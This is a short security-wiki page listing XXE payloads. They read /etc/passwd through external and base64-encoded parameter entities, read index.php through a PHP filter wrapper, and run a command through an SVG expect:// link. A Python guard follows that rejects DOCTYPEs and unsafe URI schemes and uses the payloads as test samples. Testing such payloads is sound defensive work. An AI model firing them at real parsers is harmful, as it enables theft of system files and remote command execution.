devploit's wiki
Payloads

XXE Classic

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

XXE Base64 encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

XXE using Base64 PHP Wrapper

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
<foo>&xxe;</foo>

XXE inside SVG file

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
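
A defensive counterpart to the payloads above, added here as an example and not part of the original wiki: a pre-parse guard on Python's expat bindings that refuses any DOCTYPE and any href/src attribute whose URI scheme is off an allowlist. The allowlist, the names `inspect_xml` and `Rejected`, and the benign sample are assumptions.

```python
import xml.parsers.expat as expat
from urllib.parse import urlsplit

# Assumption: only these link schemes are acceptable in submitted XML/SVG.
ALLOWED_SCHEMES = {"", "http", "https"}  # "" means a relative reference


class Rejected(Exception):
    """Raised from an expat handler to abort parsing with a reason."""


def inspect_xml(data: bytes):
    """Return None if the document passes, else the reason it was rejected."""

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Every entity-based payload on this page needs a DTD, so refuse the DOCTYPE.
        raise Rejected(f"DOCTYPE declared for <{name}>")

    def on_start(tag, attrs):
        for attr, value in attrs.items():
            if attr.split(":")[-1] not in ("href", "src"):
                continue  # also skips xmlns / xmlns:xlink namespace declarations
            scheme = urlsplit(value.strip()).scheme.lower()
            if scheme not in ALLOWED_SCHEMES:
                raise Rejected(f"<{tag}> {attr} uses scheme {scheme!r}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)  # handler exceptions propagate out of Parse()
    except Rejected as exc:
        return str(exc)
    except (expat.ExpatError, ValueError) as exc:
        return f"not well-formed: {exc}"
    return None


# Samples: three payloads from this page and one constructed benign document.
CLASSIC = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>"""
PARAM_ENTITY = b'<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>'
SVG_HREF = b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="expect://ls"></image></svg>'
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><a href="https://example.com/">x</a></svg>'  # constructed
```

A guard like this complements, and does not replace, disabling DTD and external-entity processing in the parser the application actually uses.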
Last modified 10mo ago